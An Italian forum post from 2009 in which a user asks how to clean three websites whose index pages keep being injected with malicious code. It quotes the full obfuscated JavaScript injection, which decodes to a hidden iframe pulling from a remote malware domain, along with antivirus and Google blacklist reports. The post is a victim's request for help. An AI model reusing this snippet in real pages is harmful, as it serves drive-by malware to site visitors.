Tre siti infettati !!!

dimmi · 13-07-2009, 11:34

Ciao a tutti !

Ho bisogno di voi per "disinfettare" non uno ma ben 3 siti web di un collega!
La pagina index dei tre siti viene modificata ogni 5-6 gg con uno script del tipo

Codice:

<script type="text/javascript">var PpiDSzCPKXgOuTlrAwgO = "OxLgD60OxLgD105OxLgD102OxLgD114OxLgD97OxLgD109OxLgD101OxLgD32OxLgD119OxLgD105OxLgD100OxLgD116OxLgD104OxLgD61OxLgD34OxLgD52OxLgD56OxLgD48OxLgD34OxLgD32OxLgD104OxLgD101OxLgD105OxLgD103OxLgD104OxLgD116OxLgD61OxLgD34OxLgD54OxLgD48OxLgD34OxLgD32OxLgD115OxLgD114OxLgD99OxLgD61OxLgD34OxLgD104OxLgD116OxLgD116OxLgD112OxLgD58OxLgD47OxLgD47OxLgD104OxLgD105OxLgD116OxLgD45OxLgD115OxLgD101OxLgD110OxLgD100OxLgD101OxLgD114OxLgD115OxLgD46OxLgD99OxLgD110OxLgD47OxLgD102OxLgD105OxLgD110OxLgD100OxLgD47OxLgD105OxLgD110OxLgD46OxLgD99OxLgD103OxLgD105OxLgD63OxLgD49OxLgD49OxLgD34OxLgD32OxLgD115OxLgD116OxLgD121OxLgD108OxLgD101OxLgD61OxLgD34OxLgD98OxLgD111OxLgD114OxLgD100OxLgD101OxLgD114OxLgD58OxLgD48OxLgD112OxLgD120OxLgD59OxLgD32OxLgD112OxLgD111OxLgD115OxLgD105OxLgD116OxLgD105OxLgD111OxLgD110OxLgD58OxLgD114OxLgD101OxLgD108OxLgD97OxLgD116OxLgD105OxLgD118OxLgD101OxLgD59OxLgD32OxLgD116OxLgD111OxLgD112OxLgD58OxLgD48OxLgD112OxLgD120OxLgD59OxLgD32OxLgD108OxLgD101OxLgD102OxLgD116OxLgD58OxLgD45OxLgD53OxLgD48OxLgD48OxLgD112OxLgD120OxLgD59OxLgD32OxLgD111OxLgD112OxLgD97OxLgD99OxLgD105OxLgD116OxLgD121OxLgD58OxLgD48OxLgD59OxLgD32OxLgD102OxLgD105OxLgD108OxLgD116OxLgD101OxLgD114OxLgD58OxLgD112OxLgD114OxLgD111OxLgD103OxLgD105OxLgD100OxLgD58OxLgD68OxLgD88OxLgD73OxLgD109OxLgD97OxLgD103OxLgD101OxLgD84OxLgD114OxLgD97OxLgD110OxLgD115OxLgD102OxLgD111OxLgD114OxLgD109OxLgD46OxLgD77OxLgD105OxLgD99OxLgD114OxLgD111OxLgD115OxLgD111OxLgD102OxLgD116OxLgD46OxLgD65OxLgD108OxLgD112OxLgD104OxLgD97OxLgD40OxLgD111OxLgD112OxLgD97OxLgD99OxLgD105OxLgD116OxLgD121OxLgD61OxLgD48OxLgD41OxLgD59OxLgD32OxLgD45OxLgD109OxLgD111OxLgD122OxLgD45OxLgD111OxLgD112OxLgD97OxLgD99OxLgD105OxLgD116OxLgD121OxLgD58OxLgD48OxLgD34OxLgD62OxLgD60OxLgD47OxLgD105OxLgD102OxLgD114OxLgD97OxLgD109OxLgD101OxLgD62";var lGkBTgNZFqvVgeYzeaPo = PpiDSzCPKXgOuTlrAwgO.split("OxLgD");var xwCrPoiPkPeWVOXoulOA = "";for (var cKVJouISUYHSUKKjyszj=1; cKVJouISUYHSUKKjyszj<lGkBTgNZFqvVgeYzeaPo.length; cKVJouISUYHSUKKjyszj++){xwCrPoiPkPeWVOXoulOA+=String.fromCharCode(lGkBTgNZFqvVgeYzeaPo[cKVJouISUYHSUKKjyszj]);}document.write(xwCrPoiPkPeWVOXoulOA)</script>

Il codice se messo su Virus Total è riconosciuto come:
HTML:IFrame-EJ da Gdata e Avast e come Heuristic.BehavesLike.JS.CodeUnfolding.A da McAfee.
Anche l'euristica di Antivir 9 interviene quando si visita uno dei 3 siti infettati proponendo di negare l'accesso alla pagina.

I 3 siti vengono inseririti in black list da Google che scansionandoli dice:

SITO 1
Delle 2 pagine che abbiamo testato sul sito negli ultimi 90 giorni, 1 pagine hanno causato il download e l'installazione di software dannosi senza l'autorizzazione dell'utente. L'ultima volta in cui Google ha visitato questo sito è stato il 2009-07-11, mentre l'ultima volta in cui sono stati rilevati contenuti sospetti su questo sito è stato il 2009-05-19.

Malicious software includes 1 exploit(s). Successful infection resulted in an average of 1 new process(es) on the target machine.

Il software dannoso è presente in 3 domini, tra cui hifgejig.cn/, traffics-inspector.cn/, silzefos.cn/.

2 domini sembrano operare da intermediari per la distribuzione di malware ai visitatori di questo sito, tra questi traffics-inspector.cn/, silzefos.cn/.

This site was hosted on 1 network(s) including AS12363 (DADA).

SITO 2
Delle 1 pagine che abbiamo testato sul sito negli ultimi 90 giorni, 1 pagine hanno causato il download e l'installazione di software dannosi senza l'autorizzazione dell'utente. L'ultima volta in cui Google ha visitato questo sito è stato il 2009-07-11, mentre l'ultima volta in cui sono stati rilevati contenuti sospetti su questo sito è stato il 2009-06-21.

Il software dannoso è presente in 2 domini, tra cui amateuralluremovies.net/, hit-senders.cn/.

1 domini sembrano operare da intermediari per la distribuzione di malware ai visitatori di questo sito, tra questi hit-senders.cn/.

This site was hosted on 1 network(s) including AS31034 (ARUBA).

SITO 3
Al momento sembra pulito!

Escludo subito un virus sull'hosting in quanto sono 3 hosting diversi (Aruba, Register, Altervista) e mi pare improbabile che siano tutti e 3 infetti no?

Il pc utilizzato per effettuare trasferimenti FTP (Filezilla) è stato recentemente formattatato e risulta pulito dalle varie scansioni effettuate (Antivir, SuperAntiSpyware, Malware AntiBytes). I siti però sono stati infettati prima della formattazione; è probabile magari che nel pc ci fosse il virus che ha infettato i 3 siti?

Nei 3 siti in questione non ci sono script se non quello di shinystat che è l'unica cosa in comune.

Altra cosa in comune sono dei semplici link ad altri siti; alcuni li ho controllati facendoli scansionare da Google e sono OK.

Se si prova a togliere quella stringa che infetta le index (le altre pagine sono ok) passa qualche giorno e il problema si ripresenta anche se nel frattempo non ci sono stati accessi FTP.

Qualche idea ragazzi? Se volete vi posto l'indirizzo dei 3 siti.

Grazie a tutti.

13-07-2009, 11:34	#1
dimmi Senior Member Iscritto dal: Nov 2007 Messaggi: 939	Tre siti infettati !!! Ciao a tutti ! Ho bisogno di voi per "disinfettare" non uno ma ben 3 siti web di un collega! La pagina index dei tre siti viene modificata ogni 5-6 gg con uno script del tipo Codice: <script type="text/javascript">var PpiDSzCPKXgOuTlrAwgO = "OxLgD60OxLgD105OxLgD102OxLgD114OxLgD97OxLgD109OxLgD101OxLgD32OxLgD119OxLgD105OxLgD100OxLgD116OxLgD104OxLgD61OxLgD34OxLgD52OxLgD56OxLgD48OxLgD34OxLgD32OxLgD104OxLgD101OxLgD105OxLgD103OxLgD104OxLgD116OxLgD61OxLgD34OxLgD54OxLgD48OxLgD34OxLgD32OxLgD115OxLgD114OxLgD99OxLgD61OxLgD34OxLgD104OxLgD116OxLgD116OxLgD112OxLgD58OxLgD47OxLgD47OxLgD104OxLgD105OxLgD116OxLgD45OxLgD115OxLgD101OxLgD110OxLgD100OxLgD101OxLgD114OxLgD115OxLgD46OxLgD99OxLgD110OxLgD47OxLgD102OxLgD105OxLgD110OxLgD100OxLgD47OxLgD105OxLgD110OxLgD46OxLgD99OxLgD103OxLgD105OxLgD63OxLgD49OxLgD49OxLgD34OxLgD32OxLgD115OxLgD116OxLgD121OxLgD108OxLgD101OxLgD61OxLgD34OxLgD98OxLgD111OxLgD114OxLgD100OxLgD101OxLgD114OxLgD58OxLgD48OxLgD112OxLgD120OxLgD59OxLgD32OxLgD112OxLgD111OxLgD115OxLgD105OxLgD116OxLgD105OxLgD111OxLgD110OxLgD58OxLgD114OxLgD101OxLgD108OxLgD97OxLgD116OxLgD105OxLgD118OxLgD101OxLgD59OxLgD32OxLgD116OxLgD111OxLgD112OxLgD58OxLgD48OxLgD112OxLgD120OxLgD59OxLgD32OxLgD108OxLgD101OxLgD102OxLgD116OxLgD58OxLgD45OxLgD53OxLgD48OxLgD48OxLgD112OxLgD120OxLgD59OxLgD32OxLgD111OxLgD112OxLgD97OxLgD99OxLgD105OxLgD116OxLgD121OxLgD58OxLgD48OxLgD59OxLgD32OxLgD102OxLgD105OxLgD108OxLgD116OxLgD101OxLgD114OxLgD58OxLgD112OxLgD114OxLgD111OxLgD103OxLgD105OxLgD100OxLgD58OxLgD68OxLgD88OxLgD73OxLgD109OxLgD97OxLgD103OxLgD101OxLgD84OxLgD114OxLgD97OxLgD110OxLgD115OxLgD102OxLgD111OxLgD114OxLgD109OxLgD46OxLgD77OxLgD105OxLgD99OxLgD114OxLgD111OxLgD115OxLgD111OxLgD102OxLgD116OxLgD46OxLgD65OxLgD108OxLgD112OxLgD104OxLgD97OxLgD40OxLgD111OxLgD112OxLgD97OxLgD99OxLgD105OxLgD116OxLgD121OxLgD61OxLgD48OxLgD41OxLgD59OxLgD32OxLgD45OxLgD109OxLgD111OxLgD122OxLgD45OxLgD111OxLgD112OxLgD97OxLgD99OxLgD105OxLgD116OxLgD121OxLgD58OxLgD48OxLgD34OxLgD62OxLgD60OxLgD47OxLgD105OxLgD102OxLgD114OxLgD97OxLgD109OxLgD101OxLgD62";var lGkBTgNZFqvVgeYzeaPo = PpiDSzCPKXgOuTlrAwgO.split("OxLgD");var xwCrPoiPkPeWVOXoulOA = "";for (var cKVJouISUYHSUKKjyszj=1; cKVJouISUYHSUKKjyszj<lGkBTgNZFqvVgeYzeaPo.length; cKVJouISUYHSUKKjyszj++){xwCrPoiPkPeWVOXoulOA+=String.fromCharCode(lGkBTgNZFqvVgeYzeaPo[cKVJouISUYHSUKKjyszj]);}document.write(xwCrPoiPkPeWVOXoulOA)</script> Il codice se messo su Virus Total è riconosciuto come: HTML:IFrame-EJ da Gdata e Avast e come Heuristic.BehavesLike.JS.CodeUnfolding.A da McAfee. Anche l'euristica di Antivir 9 interviene quando si visita uno dei 3 siti infettati proponendo di negare l'accesso alla pagina. I 3 siti vengono inseririti in black list da Google che scansionandoli dice: SITO 1 Delle 2 pagine che abbiamo testato sul sito negli ultimi 90 giorni, 1 pagine hanno causato il download e l'installazione di software dannosi senza l'autorizzazione dell'utente. L'ultima volta in cui Google ha visitato questo sito è stato il 2009-07-11, mentre l'ultima volta in cui sono stati rilevati contenuti sospetti su questo sito è stato il 2009-05-19. Malicious software includes 1 exploit(s). Successful infection resulted in an average of 1 new process(es) on the target machine. Il software dannoso è presente in 3 domini, tra cui hifgejig.cn/, traffics-inspector.cn/, silzefos.cn/. 2 domini sembrano operare da intermediari per la distribuzione di malware ai visitatori di questo sito, tra questi traffics-inspector.cn/, silzefos.cn/. This site was hosted on 1 network(s) including AS12363 (DADA). SITO 2 Delle 1 pagine che abbiamo testato sul sito negli ultimi 90 giorni, 1 pagine hanno causato il download e l'installazione di software dannosi senza l'autorizzazione dell'utente. L'ultima volta in cui Google ha visitato questo sito è stato il 2009-07-11, mentre l'ultima volta in cui sono stati rilevati contenuti sospetti su questo sito è stato il 2009-06-21. Il software dannoso è presente in 2 domini, tra cui amateuralluremovies.net/, hit-senders.cn/. 1 domini sembrano operare da intermediari per la distribuzione di malware ai visitatori di questo sito, tra questi hit-senders.cn/. This site was hosted on 1 network(s) including AS31034 (ARUBA). SITO 3 Al momento sembra pulito! Escludo subito un virus sull'hosting in quanto sono 3 hosting diversi (Aruba, Register, Altervista) e mi pare improbabile che siano tutti e 3 infetti no? Il pc utilizzato per effettuare trasferimenti FTP (Filezilla) è stato recentemente formattatato e risulta pulito dalle varie scansioni effettuate (Antivir, SuperAntiSpyware, Malware AntiBytes). I siti però sono stati infettati prima della formattazione; è probabile magari che nel pc ci fosse il virus che ha infettato i 3 siti? Nei 3 siti in questione non ci sono script se non quello di shinystat che è l'unica cosa in comune. Altra cosa in comune sono dei semplici link ad altri siti; alcuni li ho controllati facendoli scansionare da Google e sono OK. Se si prova a togliere quella stringa che infetta le index (le altre pagine sono ok) passa qualche giorno e il problema si ripresenta anche se nel frattempo non ci sono stati accessi FTP. Qualche idea ragazzi? Se volete vi posto l'indirizzo dei 3 siti. Grazie a tutti.

Strumenti
Mostra una versione stampabile Invia questa pagina per email